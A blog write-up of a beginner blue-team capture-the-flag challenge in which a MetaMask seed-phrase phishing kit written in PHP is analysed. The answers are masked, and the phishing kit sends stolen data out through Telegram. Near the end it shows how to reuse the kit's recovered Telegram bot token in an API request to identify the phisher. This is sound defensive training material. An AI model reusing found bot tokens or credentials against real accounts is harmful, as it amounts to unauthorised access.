CyberDefenders: GrabThePhisher

Posted bylightkunyagami 4 Comments on CyberDefenders: GrabThePhisher

This Blue Team challenge was released on 7/23/2022 from CyberDefenders. You can access the room at https://cyberdefenders.org/blueteam-ctf-challenges/95.

This is one of the easiest challenges I’ve ever encountered from CyberDefenders.org. This is a perfect challenge for beginners who just want to get their feet wet in doing hacking/IR challenges. The skills/tools to be tested and needed to complete this challenge are looking at the code used by the phishing actor through any text editor/viewer and also a little bit of research on how Telegram works.

I hope you will find my write-up helpful.

First, download the challenge file and unzip it:

  • Which wallet was used for asking the seed phrase?
    • m*******
  1. Browse to c75-GrabThePhisher > pankewk > metamask
  2. Open the file metamask.php with your choice of text editor/viewer
  • What is the file name that has the code for the phishing kit?
    • m*******.***
  • In which language was the kit written?
    • p**
  • What service does the kit use to retrieve the victim’s machine information?
    • s**** ***
  • How many seed phrases were already collected?
    • *
  1. Browse to c75-GrabThePhisher > pankewk > log
  2. Open log.txt
  • Write down the seed phrase of the most recent phishing incident?
    • f***** **** ******* ****** ******* ******* ******** ******* ***** **** ****** ******
  • Which medium had been used for credential dumping?
    • t*******
  1. Look inside the file metamask.php again
  • What is the token for the channel?
    • 5*********:***********************************
  • What is the chat ID of the phisher’s channel?
    • 5*********
  • What is the alias of the phish kit developer?
    • j***********
  • What is the full name of the phish actor?
    • M***** ********
  1. To find the full name of the phish actor, we have to use the information that we have on-hand like the Telegram userID, token, and url found inside the file metamask.php
  2. Read about the Telegram bot API from the page, https://core.telegram.org/bots/api#getchatmember
  3. We will have to utilize the sendMessage method in Telegram, passing the chatID and sending a random message through text.
  4. Enter the following to the URL bar: https://api.telegram.org/botenter_token_here/sendMessage?chat_ID= enter_userID_here&text=Hello_World
  • What is the username of the phish actor?
    • p**********

Thank you for checking my write-up. Please subscribe if you haven’t.

Published by lightkunyagami

https://tryhackme.com/badge/18276

Join the Conversation

4 Comments

  1. Reply
    1. Reply
  2. Pingback: Week XX – 2022 – This Week In 4n6
  3. Pingback: Week 31 – 2022 – This Week In 4n6
Leave a comment

Leave a Reply to jdmorto Cancel reply

Please log in using one of these methods to post your comment:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

%d bloggers like this: